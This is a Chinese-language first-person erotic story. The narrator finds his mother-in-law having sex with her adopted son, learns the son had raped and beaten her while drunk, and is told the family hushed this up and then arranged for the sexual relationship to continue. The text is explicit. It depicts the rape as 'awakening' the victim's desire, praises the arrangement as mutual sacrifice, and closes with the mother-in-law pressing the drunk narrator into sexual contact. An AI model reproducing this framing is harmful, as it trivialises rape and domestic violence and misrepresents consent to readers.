字幕網- 每日更新 永久免費

我今年35歲,妻子37歲,我和妻子都在嶽父原單位工作。
  我從小在農村長大,高中畢業後考上職業技術學院財會專業,21歲大專畢業後招聘到嶽父所在的電力部門某分公司財務室工作。
  嶽父當時是分公司的總經理,我一直慶幸自己找了一個工資福利待遇非常優厚的單位,所以工作中特別積極和認真負責。
  嶽父對我印象很好,經常鼓勵並幫助我,讓我報考函授財會本科,三年後又提名提拔我為財務室的主管會計。
  妻子在另外一個分公司的設備科工作,她是中專畢業後被嶽父安排進來的,我對她最初的印象還可以,人長的比較漂亮,穿衣、打扮很講究。
  由於我每月要到嶽父家裏送嶽父工資以外的現金補助,一來一往也就與嶽父一家人認識和熟悉了。
  後來,在嶽父的撮合下,我與他的女兒談朋友。
  嶽父一家搬進單位新蓋的住房後將原來舊房子通過單位以1萬3千元轉讓給我們。
  隨後我與妻子舉行了婚禮。我對妻子唯一不太滿意的是她的乳房有點小,就是男人們經常戲稱的「太平公主」類型的女人。
  兒子出生後一直由嶽母帶大,嶽母對我非常好,可以說是把我當作親兒子對待的。
  四年前嶽父因患癌症病故,我對他老人家十分尊重和敬重,我從內心非常感謝嶽父和嶽母對我的工作和家庭生活給予的幫助。
  農曆五月初五是中華民族古老的傳統節日--端午節。
  端午也稱端五、端陽,我們當地婦女稱該節日為「女兒節」,每到端午節女兒都要回娘家看望父母。
  女婿都要給嶽母送厚禮孝敬嶽母,俗稱「送端陽」,因此,端午節被女婿們戲稱為「嶽母節」。
  妻子受當地習俗的影響,特別重視端午節給娘家準備的禮物和禮金。
  往年除送給娘家粽子、鹹鴨蛋、時令水果等食物和煙酒外,還要給娘家送500元的紅包,妻子把它叫做送「端五」。
  今年端午節前,為了彌補三八婦女節沒有出去旅遊的遺憾,她所在的分公司組織妻子她們去外地旅遊,不能在家裏過端午節。
  端午節前兩天,妻子特意打電話讓我準備粽子、鹹鴨蛋、水果等食物給嶽母送去,還交代不要忘記500元的「端五」錢,最後她還特別強調,先打電話聯係,嶽母在家時再去送禮。
  兒子在私立學校讀書,學校要進行補課,端午節沒有放假。
  端午節那天上午十點鍾左右,小舅子打電話來,叫我回去吃飯。
  我說中午要與幾個同學聚會,晚上肯定回去吃飯。
  我和幾個同學中午聚會時喝了兩瓶渒酒,大約下午2點左右,我在超市購買了禮物,特意按照妻子的吩咐,準備了500元的紅包。
  我用手機打了嶽母家的座機,沒有人接電話,我趕緊回家拿嶽母家的鑰匙。
  我與妻子和嶽母住在一個大院裏,直線距離還不到100米。
  為了照顧嶽母的生活,我們家有嶽母家裏的鑰匙。
  小舅子原來在公司的保衛科工作,小舅子當兵複員後是嶽父幫助安排的工作。
  小舅子今年30歲,是在小舅子3歲時抱養嶽父在農村遠房親戚的小孩,是為了給嶽父家續香火的。
  幾年前小舅子酒後把別人打傷了,被判刑2年,因此而丟了正式工作。
  坐牢後小舅母與小舅子離婚,小舅子被小舅母清掃出門,財產和小孩都歸小舅母。
  小舅子出獄後,一直與嶽母在一起生活。
  小舅子好像與黑社會上的人有關係,經常幫別人打架被警察抓過多次,每次我和妻子都要幫他賠錢。
  小舅子後來談了兩個女朋友,都因喝酒後對女朋友實行暴力而告吹。
  小舅子去年因在發廊玩小姐被警察罰款5000元,我們夫妻隻好墊付了5000元錢。
  小舅子在這次嫖娼被抓後再沒有在外麵惹事生非,我以為是小舅子真正受到了教育,接受了教訓,為他能夠改邪歸正感到高興。
  今年春節前,妻子把嶽母接到我們家裏居住,嶽母告訴我,小舅子喝酒後雖然不在外麵鬧事,卻在家裏大鬧天宮,還大罵小舅子連畜生都不如。
  我感到驚奇,難道小舅子作了什幺大逆不道的事。我問過嶽母。
  嶽母紅著臉說小舅子做事太出格了,居然還敢打我,說我是一個好孩子,不要我管這件事。
  我問妻子:「小舅子到底怎幺了。」
  妻子說:「你真是一個白癡,我們家的事不用你管。」這天晚上我們夫妻在床上做家庭作業,看到妻子對我的床上表現比較滿意,就小心翼翼地問妻子,是不是小舅子醉酒後把嶽母那個了。
  妻子說:「你知道就行了,不要和任何人說,這是件醜事。這次弟弟對咱媽主要還是心理上的傷害,咱媽一直把他當作親兒子看待,我也一直把他看作親弟弟,如果這次弟弟不打咱媽,咱媽又是自願的話,我還是可以勉強接受的,因為他們沒有血緣關係,如果是強行的是絕對不能接受的。咱媽要在家裏住上一段時間,你對咱媽要比平時更好些,嘴巴放甜點。你也是一個男子漢,我在家裏時候,你可以把咱媽暫時當作一個普通女人哄哄,男人哄女人比女人哄女人效果要好的多,其作用是獨特的,沒有那個女人不願讓男人哄的,你懂嗎?但也不能太過了。」「你的意思難道是讓我和咱媽打情罵俏不成?」「有那幺一點意思就行了,也不能完全這幺做,弟弟對咱媽是心理上的傷害,他跑到外地去了,家裏隻有你這個男人可以慰平她老人家心理上的創傷。俗話說的好,丈母娘看女婿越看越喜歡,你哄媽,她會很開心的,你把媽哄高興了,我會獎賞你的。」「你用什幺獎賞我呢?」
  「當然是我的身體,你想玩什幺花樣都行,你想什幺時間玩都可以,我會讓你滿意的。」「這可是你說的啊。其實你說的獎賞用詞不準確,如果是獎賞也應該是獎賞另外一個女人吧,這至多隻能叫補償。」「看把你美的,我承認用詞不準確。我說話算數。但你不能像我弟那樣打咱媽的主意,那樣咱媽會更傷心,很可能會跳河自殺的,後果不堪設想。」「怎幺會呢,我守著漂亮的嬌妻怎幺還會看著上老太婆,咱媽除了奶子比你的奶子大之外,哪一點比的上你,沒有年青的男人會喜歡她的,要不是弟弟喝醉了,哪裏會上咱媽,要是我,倒找我錢,我也不會上的,倒胃口。」「討厭,你們男人都不是好東西,但願你不要像弟弟那樣胡來,我就省心了。我有自知之明,知道自己的乳房不算大,難於滿足我老公的要求。你也會有用詞不當的時候,不會說話,女人的乳房應該叫美乳,它是女人身上最偉大、最美好的器官之一。如果你喜歡女人的美乳,我每天都給你喂奶子,讓你吃個夠。咱媽的美乳,你隻能看,是不能動的,聽見沒有?」「遵命,老婆大人。假如要是咱媽自願的呢?」「那也不行,你要是親了媽的美乳,我會把你的嘴巴用針縫上,叫你永遠不能吃飯。你的手敢動咱媽的美乳一下,就用菜刀把你雙手砍掉。不過,我會把你喜歡咱媽的美乳的意思告訴咱媽,一個年青男人暗中喜歡她的美乳,她會很高興的!」從此,我對嶽母像親生兒子對待母親一樣關心體貼,協助妻子精心照顧她的生活,我除了經常對嶽母的美乳行注目禮之外,從未產生過其他的念頭。
  我也未按照妻子的意思與嶽母打情罵俏,我認為自己又不是鴨子,年青的男人與老女人打情罵俏太無趣了。
  我攜帶嶽母家的鑰匙,提著禮物,帶的美好地回憶爬上嶽母家裏住的最高 一層七樓。
  我用鑰匙打開門,發現門隻鎖了一道,我猜想嶽母可能就在家裏哪個角落裏,沒有聽到我打電話的鈴聲。
  我把粽子等食物和紅包放在客廳裏,準備離去。
  但又想今天是端午節,按照往年的慣例,今天要在嶽母家裏吃晚飯,剛才嶽母是不是在衛生間沒有接電話,看看嶽母在不在家裏,還是與嶽母打個招呼,看晚餐還需要購買什幺菜,我到超市去購買。
  我嶽母的房子是3室1廳,1間是嶽母的臥室(帶涼台),1間是小舅子的臥室,中間1間用作客房。
  我看到小舅子臥室的門是開著的,就進去探望,沒有人。
  客房裏也沒有人,廚房和衛生間也沒有人影。
  嶽母的臥室門沒有關嚴,我猜想嶽母可能在涼台上活動,因為涼台上有一個乘涼用的小竹床,中午有時嶽母就在涼台小竹床上休息片刻。
  我推門進了嶽母的臥室,發現涼台的後門是關著的,就將涼台的後門打開。
  眼前卻驚現不堪入目的一幕,一個男人赤身裸體的躺在小竹床上,這個男人身上正爬著一個同樣是赤身裸體的女人,可以看見女人的小穴套在男人的肉棒上。
  我驚叫了一聲。
  那個女人回頭看了一眼。
  這時我看清楚了,這對男女是嶽母和小舅子。
  我嚇的趕快離開了嶽母的家,並把門關好,急忙往家裏趕。
  我真沒有想到,小舅子強暴嶽母後,倆人會發展為通奸關係。
  我進了自家門,撥通了妻子的手機:「今天晚上我不能在咱媽家裏吃飯,向你報告一聲。」「為什幺?難道你去找相好的啊?」
  「絕不會有這樣的事,剛才我到咱媽家裏看到那個了,我不好意思再去了。
  」
  「什幺這個那個,急死人了,你到底遇到什幺鬼了?到底看到什幺了?」「就是男人和女人之間那個,我看到咱媽和小舅子那個了。」停了十幾秒,妻子在電話裏說道:「不用說了,我猜到你看到了什幺,這件事我知道,是我讓他們做的,你千萬不要聲張。你也是的,告訴你去媽家之前先電話聯係好再去。你不聽話,我看你自己怎樣下台階?」「這事確實不能怪我,我去之前打過電話,沒有人接電話,所以我才用鑰匙開的門。沒想到…」「不用解釋了,我完全相信我老公說的話。你暫時哪裏都不要去,等候我的指示,我把情況弄清楚再說。」過了大約十幾分鍾,妻子打來電話:「老公,情況弄清楚了,你說的是實情。這件事我回來後會給你一個滿意的解釋,你現在就權當什幺都沒有看見。我已經和媽說好了,晚上還是到媽家裏吃飯,你就當什幺事情都沒有發生過,讓你作難了,你可要聽話,等會弟弟會打電話來,你就到媽家裏去,你放自然些。另外,過節的禮物禮金準備好沒有?」「已經送去了,就是在送禮時才看到那個事情的。」「那你就等著弟弟的電話吧。聽話嗬,我的好老公。」過了幾分鍾,我手機收到了小舅子一個短信:「快點回媽家,媽差點被你嚇死了。」說句心裏話,小舅子雖然非常講江湖意氣,對我還是很好的,但我還是比較怕小舅子,打人出手狠毒,是一個不要命的人。
  我點燃一支煙正在考慮是否回嶽母的家。
  這時小舅子又打來電話,我大約過了10幾秒鍾才接了電話,他在電話裏說:
  「姐夫,你趕快回來,咱媽找你有急事。」
  我無可奈何,隻好慢悠悠地回到嶽母家裏。
  進門後,嶽母和小舅子已穿戴整齊,嶽母穿了一身質的較好的服裝。
  嶽母很不意思的對我說:「你剛才突然闖進來,可把我嚇壞了。你老婆與你說了吧,晚上就在家裏吃飯,我去買菜去。」說完就像什幺事情都沒有發生過似的提著籃子出了門。
  小舅子把我拉到他的房間,給我敬了一支煙,泡了一杯茶。
  「我的好姐夫,你來之前為什幺不打電話告訴我?讓我和咱媽出了洋相。」「我打了家裏的座機,家裏沒有人接電話,我以為媽在涼台澆花沒有聽到電話鈴聲,所以就直接開門進到家裏來了。你可以查看座機的來電顯示,肯定有我打的電話號碼。」「行了,不用解釋了,今後你單獨到家裏來,還是先打我的手機吧,不要搞的大家都不好看。」「知道了,我一定注意。」
  小舅子接著說:「今天的事你都看到了,我姐知道這件事,你可以打電話問我姐。」「這事是你們家裏的內部事務,與我無關,不用打電話,還是讓她安心地在外麵旅遊吧,等她回來以後再說吧。」「你什幺意思?難道說我姐回來了,你還要到她那裏去告狀不成嗎?我希望你識像點,不要沒有事找事,把簡單的事搞複雜了。」「我不是這個意思,我以人格保證不把今天的事告訴別人。」「你告訴我姐也不要緊,這事可是我姐的主意。我雖然沒有你文化高,但我起碼知道我與任何人通奸,包括與我姐通奸都不犯法。」我聽這話,差點跳起來。
  「你把你姐怎樣了,我要與她離婚。」
  「我的好姐夫,你不要激動嗎,我和我姐隻是普通的姐弟關係,是一清二白的,你不要疑心疑鬼。好吧,為了打消你的顧慮,我可以把事情的來龍去脈全部告訴你,你完全可以找我姐去核實。真是每家都有一本難念的經,請你能夠理解我當兒子的苦衷。我這個人還是很講良心的,不像別人說的那幺壞。」小舅子為了取得我的理解和信任,就將與嶽母發生的故事一五一十告訴了我。
  嶽母幾年前因中風辦理了病退手續在家休養,經過二年多的治療和調養,身體狀況逐漸好轉,前些年已完全恢複正常。
  去年初,嶽母與一個比她大十歲左右的離異老頭好上了。
  小舅子和妻子堅決反對,因為那個老頭的妻子經常找老頭的麻煩,糾纏不休,老頭的子女們也都希望自己的父母破鏡重圓,雙方子女都反對嶽母和老頭交往。
  我聽說過這件事,因為女婿是外姓人,不可能摻合意見。
  後來雙方的子女在一起商量了一個辦法來了結這件事,由小舅子出麵作惡人,拿刀威脅老頭,不準老頭與嶽母再來往。
  小舅子的狠勁在當地很有名氣,老頭被小舅子嚇住了,又出於自身家庭的原因,不敢再與嶽母來往。嶽母知道後,非常傷心,這件事就這樣過去了。
  一年來誰都沒有再提起這件事,嶽母也沒有找到新的相好的。
  去年小舅子嫖娼被公安罰款,讓嶽母喪透了心,主要是感覺到沒有臉見人。
  小舅子原來所交的女朋友知道小舅子嫖娼的劣跡後,都躲著小舅子,小舅子也非常沮喪。
  今年元旦後的一天晚上,小舅子和幾個哥們又在外麵喝酒喝高了,被別人抬回嶽母家裏。
  淩晨時小舅子性慾發作強暴了嶽母。
  由於遭到嶽母的極力反抗,小舅子還打了嶽母幾耳光。
  天亮後,嶽母打電話把妻子喊去,小舅子的酒已醒了大半。
  妻子惱羞成怒,氣的拿著手機要報警。
  小舅子跪著求妻子千萬不要報警。
  嶽母也說報了警,事情張揚出去,她這張老臉往那裏放。
  小舅子說出了狠話,如果報警,在警察來之前就用菜刀割腕自殺謝罪。
  妻子沒有辦法,隻好作罷,把嶽母接到我們家裏住。
  原來小舅子醉酒後,將嶽母當作了他的女朋友,他從來都沒有產生過強暴嶽母的念頭。
  他說在外麵玩過幾個年青女人,決不會打咱媽這個老女人的主意,並吹噓說現在花500元,就可以玩到姿色不錯的女人,怎幺會打老太太的主意。
  小舅子強暴嶽母的醜事發生後,就躲到外地哥們朋友那裏去了,今年春節除夕時團年都沒有回家。
  春節放假期間,嶽母和妻子多次打電話要小舅子回來過正月十五,並說今後隻要不再做糊塗事,她們都可以原諒他。
  小舅子趕回家過正月十五,一家人算是勉強過了個團圓年,嶽母和小舅子之間的母子關係又恢複到正場☆態。
  小舅子仍然居住在嶽母家裏,在朋友開的公司裏負責保安工作,也算能夠自食其力。
  有一天,嶽母勸小舅子,說千萬不要出去找小姐,找小姐很容易得性病,憋不住了,家裏的女人可以幫助你解決。
  小舅子以為嶽母要他去找姐姐解決這個問題,斷然予以拒絕。
  過了幾天,嶽母又說,她看上的老頭,你們不準和他好,她有時也有一些這方麵的需求,兒子能否順便的幫助解決一下,這叫互通無有。
  小舅子開始並沒有同意,並提出嶽母可以找女婿解決問題,他在名義上是她的兒子,這樣做不好,是亂倫。
  嶽母說:「你還好意思說是亂倫,你還強 奸過我,這件事與你姐姐商量好了,就算媽求你了,就算媽同意和女婿做,姐姐肯定不會同意的。」小舅子當時的態度很堅決,不同意和嶽母再次發生性關係。
  過了幾天,妻子找到小舅子,說起拆散嶽母相好老頭的事,覺得真有一點對不起咱媽。
  咱爸去逝了幾年,咱媽還是很守婦道的,從來沒有做過對不起咱爸的事,咱媽作為一個女人,有性方麵的要求也是正常的,特別是你醉酒後強暴了咱媽,把咱媽潛在的性慾激活了,你總要負點責任吧。小舅子說,這件事我是有責任,現在咱媽沒有找到合適的老伴,這方麵的事最好讓姐夫臨時性地幫助解決一下,他們也沒有血緣關係,做起來不會有那幺多顧慮,無非姐姐受點損失。我現在又找了一個女朋友,我早晚還是要結婚的,我的問題可以找女朋友去解決,要是姐姐不好開口,我去和姐夫說。
  妻子堅決不同意用其丈夫幫助嶽母解決性問題,說不到萬不得已不能這樣做。
  妻子說:「現在沒有更好的辦法解決這個問題,你就不要推卸責任了,誰讓你是我們家唯一的男人,希望小舅子對媽好一些,溫柔一些。你不要到外麵去鬼混了,惹事生非,再在外麵出了事,就沒有人再管你了。不是我舍不得貢獻出你姐夫,男人本身就沒有什幺好東西,都是些低級動物,包括你在內,這山望著那山高,吃著碗裏看著鍋裏的,性慾來了是女人就可以幹,如果你姐夫和咱媽做了那種事,萬一我和你姐夫離了婚,豈不是讓那小子沾了大便宜,白玩了我們家二代女人。現在又不是讓你和咱媽天天做這事,十天半月的弄個回把就行了,以後你結了婚,如果咱媽還沒有找到合適的老伴,我會把你姐夫貢獻出來的,現在隻能辛苦你了。再說你現在沒有什幺錢,沒有女人長期會願意跟你。這件事情一定不能讓你姐夫知道,他畢竟是外姓人,現在不能讓他這個外姓人首先享受了咱媽的肉體,還是交給你先享用一段時間吧,權當換個口味吧!」姐姐又提出:「你要嫌咱媽太老了,我可以適當的補償,我畢竟比媽媽年青,肯定比媽媽會玩一些新花樣,讓你玩的更刺激些。」小舅子說:「姐姐千萬不要這樣,姐夫這個人還是相當不錯的,他是個好男人,從來不在外麵與女人鬼混,我不能對不起姐夫,我同意你和咱媽說的事。」妻子還交代:「咱媽雖說也是女人,但年齡大了非常傳統,不要和她玩青年人那些花樣,那樣會傷害咱媽的自尊心,你行事時一定小心,不要隻顧自己快活,要考慮到咱媽身體的承受能力,如果有可能,你盡量在下麵,讓咱媽在上邊,讓咱媽少受點苦,我會去和咱媽說。你不要主動提出這事,咱媽提出來了,你再去做這事。你要是敢在咱媽身上胡來,小心我用剪刀剪斷你的小雞雞,讓你當太監。」事與至此,小舅子隻好答應和嶽母發生性關係。他說:「最近主要還是和女朋友發生性關係,與一個老女人偶爾發生性關係,感覺還是有一點刺激。姐夫,你應該感謝我才對,沒有我挺身而出,就應該是你為咱媽盡孝心了。如果姐夫也想嚐嚐咱媽這個老女人肉體的味道,咱媽可是求之不得的。」小舅子與嶽母保持這種關係已經有三個月左右,每個月隻有幾次。
  我多數情況下回來的很晚,有時晚上不回來。所以咱媽很會抓住機會,一般是中午讓我喝幾兩白酒後過性生活,她又多半是爬在我身體上主動做。
  我們晚上幾乎沒有發生過性關係。
  今天上午我打電話讓你回來吃午飯,你有應酬,我中午一個人喝了半斤白酒,喝了酒咱媽就自然想那事,沒有想到我們才開始不到五分鍾,就讓你看見我們母子倆的醜態。
  請姐夫放心,我和姐姐是清白的,決不會發生那種事,我的為人你是知道的,我絕對不會做對不起姐姐和姐夫的事,姐姐那幺說隻是為了激將我能夠同意陪咱媽。
  我姐姐是你老婆,你是最了解的,你最有發言權,她絕對不是那種人,我也不會把所有的缺德事都做盡吧,況且我玩的女人都比我姐年青漂亮,我決不會打我姐的主意。
  我聽完小舅子的敘說,感到非常意外,也非常震憾,我的理智告訴我,應該完全相信小舅子說的話是真實情況。
  我也為他們母子之間在特殊的環境裏能夠互相取暖、互相犧牲、互相幫助的精神所感動,他們母子之間的行為確實不能簡單的用人世間正常的倫理道德來衡量的。
  我說:「今天隻能怪我,我應該先打通你或者咱媽的手機後,再到家裏來。
  我急匆匆地到家裏來,主要還是看看家裏缺少什幺過節的物質,我準備到街上去購買。沒有想到我的莽撞造成你們母子那幺難堪,我向你和媽表示歉意。」「今天的事情也不能怪你,你是我們母子和姐姐之外最重要的親人,希望你能夠理解我們母子,不要看不起我們母子倆人。」「我完全理解,俗話說的好,家醜不可外揚。我一定嚴格保密,對誰都不會說的,請你和媽放心,否則的話,我不得好死。」聽了我的口頭保證,小舅子完全放鬆下來,對我說:「都是自家人,我相信你說的話,上次你替我在派出所交了罰款,救了我的急,否則就會被警察拘留的,我一直記著你的好處,我今後會報答你的,請姐夫放心。你趕快打姐姐的電話,告訴她晚上你在家裏過節吃飯,讓她在外麵放心。」「我已經完全相信你說的話,沒有必要再給你姐打電話了。」這時嶽母買菜回來了,衝我一笑,對我說:「我買了幾樣你最喜歡吃的菜,要好好招待你,晚上和弟弟喝幾杯」。小舅子叫我冼菜去,我隻好進了廚房。小舅子和嶽母進了客房,把門關上,不知道他們說些什幺,做些什幺。大約過了半小時,我把菜已經準備好了,準備炒菜,小舅子到廚房裏跟我說:「姐夫,今天我來炒菜,你先去陪媽說會話。菜炒好了,我會喊你的。」我也不好多說什幺,就去嶽母的臥室找嶽母說話去了。
  嶽母主動招呼我說:「你能給媽倒一杯飲料嗎?」我打開客廳的冰箱給嶽母倒了一杯酸奶,我看見我給的紅包放在冰箱上麵,我走進嶽母的臥室將酸奶遞給嶽母。
  嶽母一口氣喝完了,對我說:「謝謝你還能照顧我,你到客廳給我拿點紙,我擦擦嘴巴。」我又到客廳撕了一塊餐廳紙遞給嶽母,嶽母把嘴巴擦了一會。
  這時我才注意嶽母此時的衣著,嶽母買菜回來後,不知什幺時候已換上一件老式白汗衫,乳房處的所有輪廓可以清楚看到。
  我還是第一次看到她沒有戴胸罩的身體形狀,下身穿著一件黑色的裙子。
  她看到我望著她的上身發楞,嶽母笑著對我說:「我一個老太婆有什幺好看的,又沒有外人,在家穿的隨便點,你不會見怪吧。過來,陪媽說說話。」我搬了一張椅子坐了下來,嶽母坐在床邊上,我們相距有一米遠。
  嶽母說:「我對不起你爸,今天在女婿麵前出醜太不應該了,我無地自容,不過這事,你老婆可是知道的,是她的主意,我有很大的責任。我以為你早就知道這件事,這可不是一件什幺光彩的事,請你千萬要保密,不能說回去。人活一張臉,這件事張揚出去,我就沒臉活了,隻好投河自盡見你爸去了。」「媽,你千萬不要這樣說,弟弟已經把這件事解釋的非常清楚了,我完全理解你們母子,你再解釋就見外了,不像一家人了。再說了,弟弟又不是你親生的,不存在著性關係方麵的文明社會禁忌。我已經向弟弟保證,決不把今天發生告訴任何人,請媽放一百個心一千個心一萬個心。這種事現在社會上又不是沒有先例,我們單位就有這種事,隻要不拿結婚手續就沒人管,況且又不影響到別人。
  你老人家看好的相好又被雙方的子女拆散了,咱爸過世多年,你從來沒有做過對不起咱爸的事情。你年齡大了,為了有一個幸福的晚年,的確需要一個男人陪伴,不論從心理上還是生理上都是必不可少的,這有利於你老人家健康長壽。」「你的小嘴巴真甜,真會說話,你說的話我愛聽。要不是你弟弟在家裏,我真想親你一口。我從內心還是十分感謝你,我的好女婿,我和你爸沒有白疼你。
  我要有你這個親兒子就好了。我真想認你作我的親兒子,不知道你是否願意?」「我願意。」「你怎幺低著頭和我說話,難道我會把你吃了不成,如果說不好意思的話,也是我和你弟弟不好意思,還是把頭抬起來說話,我一個老女人不怕你看劃得來。」我隻好把頭抬起來,看見嶽母的眼光火辣辣的,隻好將眼睛望著嶽母的胸部,不好意思的說道:「媽,這不是願意不願意的事情。俗話說的好,一個女婿半個兒。我們夫妻都會把你當作最親的人,會盡到孝心的。我已經是你的親女婿,喊你媽多年,我們又有母子情分,就沒有再認我為乾兒子的必要。事實上,我已經把你當作親媽媽對待了。」「什幺乾兒子濕兒子的,把你認作兒子,這是我的心願,你知道兒子和女婿有什幺不同嗎?」「我知道,就是兒子喊媽媽時會更親熱些,更順口些,就是讓你老人家生活快樂,為你養老送終?」「好女婿,你不要在麵前給我裝糊塗了,你在孝敬老人方麵已經做的很好了,你是天下最好的女婿。你弟弟太不爭氣,說不定哪天又要進班房,到那時我去依靠誰呀?」「不會的,弟弟現在進步很大,基本上能夠自食其力了,警察很長時間沒有找弟弟的麻煩了,說明他在外麵沒有胡作非為,這是你老人家哺育、教育、幫助的結果。」「你在挖苦我,取笑我。你弟弟3歲時才到我們家裏來,他什幺時間吃過我的奶。你不要扯遠了。我們之間難道還有什幺話說不出口嗎?難道說你真的不知道我的心思嗎?」嶽母非常激動的站了起來,我趕快也站起來,雙手扶著嶽母讓她在床邊坐下。
  嶽母的雙手順勢拉著我的左手小聲的說道:「你再挖苦我,我可要打你兩耳光,我還真舍不得打你呢?」我把左手從嶽母手中抽出來,回到座位上。
  「我說錯了,請媽不要責怪我。你的意思是讓我像弟弟那樣照顧你的生活,是這樣嗎?」「就是這個意思,你願意嗎?」
  「我當然願意,你可以搬到我們家裏去住,我們照顧你的生活會方便些,把現在房子留給弟弟住。」「那不行,這套房子是你爸留下來的,算是祖屋,我要守在這裏養老,等我百年之後再留給你弟弟。隻要你願意就好辦了,有些事以後再說吧。」我和嶽母都放鬆下來,接下來就像平時那樣閑聊起來。
  小舅子進了嶽母的臥室。
  「媽,姐夫吃飯了。我看你們說的好開心啊,吃過飯再聊吧。」我和嶽母來到客廳,看見桌子上擺了大約有八九個菜,有涼菜,有熱菜,還有幾個煮熟的粽子和鹹鴨蛋,桌子上還放了一瓶紅星二鍋頭和一瓶幹紅葡萄酒。
  小舅子打開二鍋頭,倒在兩個玻璃杯子裏,我估計一杯有二兩酒。
  小舅子又給嶽母倒了一杯乾紅葡萄酒。
  小舅子舉杯發表了祝酒詞:「今天是端午節,首先祝福咱媽身體健康,長命百歲,祝姐姐越來越漂亮,祝外甥在學校取得好成績,祝姐夫事業有成。姐夫,我們哥倆第一次要喝一大口。」說完就把杯中的酒喝去了一半,我也隻好將杯中的酒喝去一半。
  嶽母喝了一口葡萄酒後給我和小舅子每人剝了一個鹹鴨蛋,讓我們不要隻顧喝酒,多吃點菜。
  我們吃飯時有說有笑,權當今天什幺都沒有發生一樣,聊了一些社會上的趣聞,嶽母不斷給我和小舅子夾菜。就這樣,不到半個小時,一瓶白酒喝去了一多半。
  這時小舅子手機鈴聲響了,小舅子進了客房接了電話,說朋友的電話,三缺一要去打麻將。
  小舅子對我說:「姐夫,失陪了,剩下的白酒你陪媽喝吧,今天是過節,你可要盡興啊。」說完就拿了兩個粽子和手提包就準備出門,又順手將冰箱上我送的紅包放進包裏,向嶽母做了一個鬼臉就出門了。
  看來我給嶽母送的紅包500元錢小舅子還及時用上了派場。
  小舅子出門後,嶽母將白酒給我酌滿。
  我說:「再不能喝了,這是高度酒,再喝就要醉了,會出洋相的。」「那就喝最後一杯吧,我用紅酒陪你。我看你熱的冒汗,這裏又沒有外人,幹嗎要全副武裝,你把長袖衣服和褲子脫了,我也去換件衣服。」嶽母進了臥室把門關上,我趕快把長襯衣和長褲脫了放在沙發上,隻穿著背心和短褲坐在原來的位置上。
  過了一會嶽母出來了坐在我對麵,嶽母全身隻穿了一件花短褲,露著兩個大奶子,我還是感到很意外。
  我看著嶽母兩個大奶子,勸嶽母道:「媽還是穿一件衣服吧,要是來人看到很不雅觀,會說我們的閑話的。」「現在都在家裏過節,誰會來串門。你小子不要不知好歹,我聽你老婆說,你十分喜歡我的大奶子,是不是?」「媽,那裏我們夫妻之間在房中說的悄悄話,是玩笑話,不能當真的。」「當著我的麵還敢說假話,我們剛才在一起聊天時,我沒有穿胸罩,你一直看著我的奶子,眼睛都看直了,喜歡就是喜歡,我知道你喜歡,否則我不會不穿胸罩接待你的,你看你現在還用賊光盯著我的奶子呢。」「就算我喜歡吧,你還是把衣服穿上。」「終於說實話了,你小子不像個男人,敢想不敢做,對我這個老太婆也是賊心不死。」「老婆大人有交代,隻能看,不能動的。我現在已經看飽了,媽還是把衣服穿上,我們趕快吃飯吧。」「難道你今天晚上還約了相好的,那樣著急的要吃飯去會相好的嗎?」「絕對沒有的事。」「沒有就好,我還聽說,你喜歡女人主動給你喂奶子吃。」「老婆也真是的,什幺話都往外說。」「你老婆可是我親生女兒,母女連心嗬。我們母女沒有什幺話不能說的。當姑爺的現在當然是看夠了,也得到了享受。我可是作出了犧牲,你難道不能給我補償一下嗎?讓我心裏也好想些。」「媽,你說你讓我怎樣,你才能把衣服穿上,是不是讓我替你幫你穿上上衣。」「我的好女婿,別把我看的那幺壞好不好,你隻要摸摸我的奶子,親我兩口,我立刻把衣服穿上,決不食言。」「你可要說話算數,否則的話,我今後永遠不敢相信媽說的話。」「放心吧,我不會強迫你做其他事情的。」我站了起來,離開了餐桌。
  嶽母站在麵前。
  我小心地用雙手去撫摸嶽母的兩個大奶子,感覺到心理特別舒坦。
  摸了大約十秒鍾時間,嶽母突然用雙手摟著我脖子,把嘴巴伸給我,我們互相熱烈地接了吻。
  我突然清醒過來,現在不能再繼續下來,否則今天就無法收場了。
  我逃避了嶽母的親吻,把嘴巴移到一邊說道:「媽,就這樣吧,來日方長,今後我一定多和你老人家親嘴,多摸你的大奶子,讓你享福。你還是把衣服穿上,我們接著喝酒吃飯。」嶽母非常失望,依依不舍的把我鬆開,走進臥室把白汗衫重新穿上。
  我們又重新坐到餐桌的原來位置上。
  嶽母說:「如果你覺得喝的多了,就喝最後一杯吧,我陪你慢慢喝,多吃點菜,等會吃一個粽子,別傷著身子。」「媽,可說好了,最後一杯。」
  嶽母好像突然想起什幺來,正經起來,主動與我聊起我兒子小時候和現在在學校學習的事情,讓我鬆了一口氣。
  我們在八點半左右吃完了飯,我覺得頭有些暈,畢竟我喝的是六十多度的高度酒。
  我硬撐的和嶽母一起收拾了碗筷,我最後又在客廳用拖把拖地。
  這時客廳的座機鈴聲響了,嶽母接過電話,原來是小舅子的電話。
  嶽母聽著小舅子講了幾句話並笑了起來,就叫我接電話,她把電話話筒遞給我。
  小舅子在電話裏說道:「我今天晚上不能回來休息,你就在我臥室休息,如果你擔心有意外,就把臥室門插上睡覺,咱媽不會幹擾你的。」沒等我回話,小舅子就把電話掛了。
  嶽母問我,弟弟和你說了什幺話。
  我說:「弟弟說今天不回來休息,讓我在他的臥室休息。可是,我喝多了,還是想回自己的家裏休息更方便些。」「你弟還說了什幺其他事情嗎?」
  「沒有嗬。」
  「你弟和我可不是這樣說的。」說完,嶽母撥通了小舅子的電話。
  「你姐夫說他今天要回自己家裏休息,你好好和他說說,我一個人在家裏好害怕。」我接過電話,對小舅子說:「咱媽誤會了,我沒有說非要回去休息,這事還可以商量的。」「姐夫,你也真是的,當女婿的,連丈母娘都哄不好。今天是過節,她又受到了你的驚嚇,你可不能再做咱媽不高興的事情。是否回家休息,你自己看著辦吧,好了,掛了。」我想這下完蛋了,我上了他們母子倆的圈套了,現在想走都無法脫身了。
  嶽母對我說:「你發什幺楞,你剛才喝了不少白酒,你要回去就趕快回去吧,我不會阻攔你。你要是在弟弟房間休息,就趕快洗澡去,洗完澡就上床早點休息吧。」看來,我現在已經沒得什幺選擇的餘地了,隻好到嶽母家裏的衛生間去洗澡。
  我在嶽母家裏的衛生間邊洗澡,邊把今天下午發生的事情在大腦裏從頭到尾重新過濾了一遍,我認為今天下午隻做錯了一件事,不應該在嶽母的引誘下摸了嶽母的奶子並與嶽母親嘴,現在已經落到完全沒有退路的境地。
  嶽母與小舅子關在客房裏說了什幺,老婆在電話裏與嶽母、小舅子說了什幺,小舅子剛才在電話裏與嶽母說了什幺,我都不得而知。
